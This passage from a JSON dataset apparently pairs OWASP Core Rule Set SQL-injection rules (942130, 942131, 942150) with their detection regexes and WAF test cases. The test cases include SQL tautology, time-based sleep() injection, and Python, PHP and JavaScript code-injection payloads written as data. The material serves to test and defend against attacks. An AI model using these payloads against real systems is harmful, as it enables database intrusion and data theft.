"method": "GET", "uri": "/get?a=42<=>42", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=42<=>42" } ] }, { "description": "SQL Injection Attack: SQL Tautology using glob", "test_id": 10, "request": { "method": "GET", "uri": "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "user=admin%40juice-sh.op'%20and%20password%20glob%20password;" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 689, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b[\\s\\x0b\\\"'-\\)`]*?(?:=|<=>|(?:sounds[\\s\\x0b]+)?like|glob|r(?:like|egexp))[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b", "actions": [ { "act_name": "id", "lineno": 690, "act_quote": "no_quote", "act_arg": "942130", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 691, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 692, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 693, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 694, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 694, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 694, "act_quote": "no_quote", "act_arg": "replaceComments", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 695, "act_quote": "quotes", "act_arg": "SQL Injection Attack: SQL Boolean-based attack detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 696, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.942130_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 697, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 698, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 699, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 700, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 701, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 702, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 703, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 704, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 705, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 706, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 707, "act_quote": "quotes", "act_arg": "tx.942130_matched_var_name=%{matched_var_name}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 708, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 689 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "1", "negated": false } ], "operator": { "type": "@streq", "argument": "%{TX.2}", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 709, "variables": [ { "variable": "TX", "variable_part": "1", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@streq", "operator_argument": "%{TX.2}", "actions": [ { "act_name": "t", "lineno": 710, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 711, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 712, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 709 } }, { "rule_id": "942131", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b[\\s\\x0b\\\"'-\\)`]*?(?:![<->]|<[=>]?|>=?|\\^|is[\\s\\x0b]+not|not[\\s\\x0b]+(?:like|r(?:like|egexp)))[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "replaceComments" ], "metadata": { "phase": "2", "message": "SQL Injection Attack: SQL Boolean-based attack detected", "logdata": "Matched Data: %{TX.0} found within %{TX.942131_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack: SQL Tautology", "test_id": 1, "request": { "method": "GET", "uri": "/get?a=11!=1", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=11!=1" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 2, "request": { "method": "GET", "uri": "/get?a=1!=11", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=1!=11" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 3, "request": { "method": "GET", "uri": "/get?a=11!=11", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=11!=11" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 4, "request": { "method": "GET", "uri": "/get?a=1%20is%20not%202", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=1%20is%20not%202" } ] }, { "description": "SQL Injection Attack: SQL Tautology negative", "test_id": 5, "request": { "method": "GET", "uri": "/get?a=1%20is%20not%201", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=1%20is%20not%201" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a='1' not regexp '2'" }, "expected": { "should_block": true, "rule_ids": [ 942131 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a='1' not regexp '2'" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a='1' not regexp '1'" }, "expected": { "should_block": false, "rule_ids": [ 942131 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a='1' not regexp '1'" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 725, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b[\\s\\x0b\\\"'-\\)`]*?(?:![<->]|<[=>]?|>=?|\\^|is[\\s\\x0b]+not|not[\\s\\x0b]+(?:like|r(?:like|egexp)))[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b", "actions": [ { "act_name": "id", "lineno": 726, "act_quote": "no_quote", "act_arg": "942131", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 727, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 728, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 729, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 730, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 730, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 730, "act_quote": "no_quote", "act_arg": "replaceComments", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 731, "act_quote": "quotes", "act_arg": "SQL Injection Attack: SQL Boolean-based attack detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 732, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.942131_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 733, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 734, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 735, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 736, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 737, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 738, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 739, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 740, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 741, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 742, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "multiMatch", "lineno": 743, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 744, "act_quote": "quotes", "act_arg": "tx.942131_matched_var_name=%{matched_var_name}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 745, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 725 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "1", "negated": false } ], "operator": { "type": "@streq", "argument": "%{TX.2}", "negated": true } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 746, "variables": [ { "variable": "TX", "variable_part": "1", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@streq", "operator_argument": "%{TX.2}", "actions": [ { "act_name": "t", "lineno": 747, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 748, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 749, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 746 } }, { "rule_id": "942150", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:json(?:_[0-9A-Z_a-z]+)?|a(?:bs|(?:cos|sin)h?|tan[2h]?|vg)|c(?:eil(?:ing)?|h(?:a(?:nges|r(?:set)?)|r)|o(?:alesce|sh?|unt)|ast)|d(?:e(?:grees|fault)|a(?:te|y))|exp|f(?:loor(?:avg)?|ormat|ield)|g(?:lob|roup_concat)|h(?:ex|our)|i(?:f(?:null)?|if|n(?:str)?)|l(?:ast(?:_insert_rowid)?|ength|ike(?:l(?:ihood|y))?|n|o(?:ad_extension|g(?:10|2)?|wer(?:pi)?|cal)|trim)|m(?:ax|in(?:ute)?|o(?:d|nth))|n(?:ullif|ow)|p(?:i|ow(?:er)?|rintf|assword)|quote|r(?:a(?:dians|ndom(?:blob)?)|e(?:p(?:lace|eat)|verse)|ound|trim|ight)|s(?:i(?:gn|nh?)|oundex|q(?:lite_(?:compileoption_(?:get|used)|offset|source_id|version)|rt)|u(?:bstr(?:ing)?|m)|econd|leep)|t(?:anh?|otal(?:_changes)?|r(?:im|unc)|ypeof|ime)|u(?:n(?:icode|likely)|(?:pp|s)er)|zeroblob|bin|v(?:alues|ersion)|week|year)[^0-9A-Z_a-z]*\\(", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack: SQL function name detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Simple SQL injection", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" } ] }, { "description": "Simple SQL injection", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=1' and sleep(9) #" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=1' and sleep(9) #" } ] }, { "description": "Simple SQL injection", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=1(select*from(select(sleep(5)))d)" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=1(select*from(select(sleep(5)))d)" } ] }, { "description": "Advanced SQL injection", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" } ] }, { "description": "", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=test')and (select*from(select(sleep(10)))d)--" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=test')and (select*from(select(sleep(10)))d)--" } ] }, { "description": "Simple SQL injection", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=config.ini' and sleep(91) #" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=config.ini' and sleep(91) #" } ] }, { "description": "Simple SQL injection", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=None')and (select*from(select(sleep(10)))a)--" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=None')and (select*from(select(sleep(10)))a)--" } ] }, { "description": "Advanced SQL injection", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" } ] }, { "description": "Simple injection", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=file:/init.ini'.sleep(12).'" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=file:/init.ini'.sleep(12).'" } ] }, { "description": "Advanced SQL injection", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" } ] }, { "description": "Advanced SQL injection", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" } ] }, { "description": "Simple injection", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" } ] }, { "description": "Simple injection", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=test{${sleep(12)}}" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=test{${sleep(12)}}" } ] }, { "description": "Advanced injection", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" } ] }, { "description": "Advanced injection", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" } ] }, { "description": "Simple injection", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\foobar.txt\" or sleep(4) #" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\foobar.txt\" or sleep(4) #" } ] }, { "description": "SQLite 'json' function", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" } ] }, { "description": "SQLite 'json_valid' function", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" } ] }, { "description": "SQLite 'glob' function", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" }, "expected": { "should_block": true, "rule_ids": [ 942150 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 762, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": 